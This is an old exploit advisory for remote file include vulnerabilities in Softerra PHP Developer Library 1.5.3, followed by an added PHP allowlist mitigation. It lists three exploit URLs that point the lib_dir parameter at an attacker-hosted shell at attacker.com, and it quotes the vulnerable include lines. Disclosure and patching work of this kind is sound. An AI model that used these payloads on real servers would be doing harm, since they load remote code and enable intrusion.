# Title : Softerra PHP Developer Library <= 1.5.3 File Include Vulnerabilities
# Published : 2006-10-12
# Author : MP
#################################################################
#
# [ Softerra PHP Developer Library ]
#
# Class: Remote File Include Vulnerability
# Patch: Unavailable
# Published: 2006/10/12
# Remote: Yes
# Local: No
# Type: High
# Site: http://www.softerra.com/products_php-library.htm
# Author: MP
# Contact: mp01010@yahoo.com
#
#################################################################
Exploit:
http://softerraphpdeveloper.com/PHPLibrary-1.5.3/lib/registry.lib.php?lib_dir=http://attacker.com/shell?
http://softerraphpdeveloper.com/PHPLibrary-1.5.3/lib/sqlcompose.lib.php?lib_dir=http://attacker.com/shell?
http://softerraphpdeveloper.com/PHPLibrary-1.5.3/lib/sqlsearch.lib.php?lib_dir=http://attacker.com/shell?
Vuln Files:
registry.lib.php
sqlcompose.lib.php
sqlsearch.lib.php
Vuln Code:
#
../lib/registry.lib.php
<? ...
require_once ($lib_dir . "sqlstorage.class.php");
... ?>
##
../lib/sqlcompose.lib.php
<? ...
require_once ($lib_dir . "array.lib.php");
... ?>
##
../lib/sqlsearch.lib.php
<? ...
require_once ($lib_dir . "array.lib.php");
... ?>
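Mitigation sketch for the three includes above, as an added example (not Softerra's code and not part of the original advisory). It assumes $lib_dir reaches these scripts from the request (for example with register_globals enabled) and that the included files sit in the same lib/ directory; PHPLIB_DIR, phplib_allowed() and phplib_path() are hypothetical names.

```php
<?php
// Added example, not Softerra's code: a helper the three vulnerable files
// could load first, so the include path is never built from $lib_dir.
// Assumption: sqlstorage.class.php and array.lib.php live beside this file.
// Related php.ini hardening: register_globals = Off, allow_url_include = Off.

// Fixed from this file's own location; nothing from the request is used.
define('PHPLIB_DIR', realpath(dirname(__FILE__)));

// Only the two files the advisory shows being loaded are permitted.
function phplib_allowed()
{
    return array('sqlstorage.class.php', 'array.lib.php');
}

// Return the absolute path of an allowlisted library file.
// On any mismatch: log, answer 403 and stop, instead of including.
function phplib_path($name)
{
    $path = false;
    // Exact-match allowlist rejects URLs, stream wrappers and "../".
    if (is_string($name) && in_array($name, phplib_allowed(), true)) {
        $path = realpath(PHPLIB_DIR . DIRECTORY_SEPARATOR . $name);
    }
    // realpath() follows symlinks, so confirm the result is still in lib/.
    if ($path === false
        || strpos($path, PHPLIB_DIR . DIRECTORY_SEPARATOR) !== 0
        || !is_file($path)) {
        error_log('phplib: refused include of ' . var_export($name, true));
        if (!headers_sent()) {
            header('HTTP/1.1 403 Forbidden');
        }
        exit;
    }
    return $path;
}

// Replacement lines (shown as comments because they belong in other files):
//   registry.lib.php:
//     require_once phplib_path('sqlstorage.class.php');
//   sqlcompose.lib.php and sqlsearch.lib.php:
//     require_once phplib_path('array.lib.php');
```

Until the code is changed, denying direct web access to the lib/ directory keeps these files from being requested on their own.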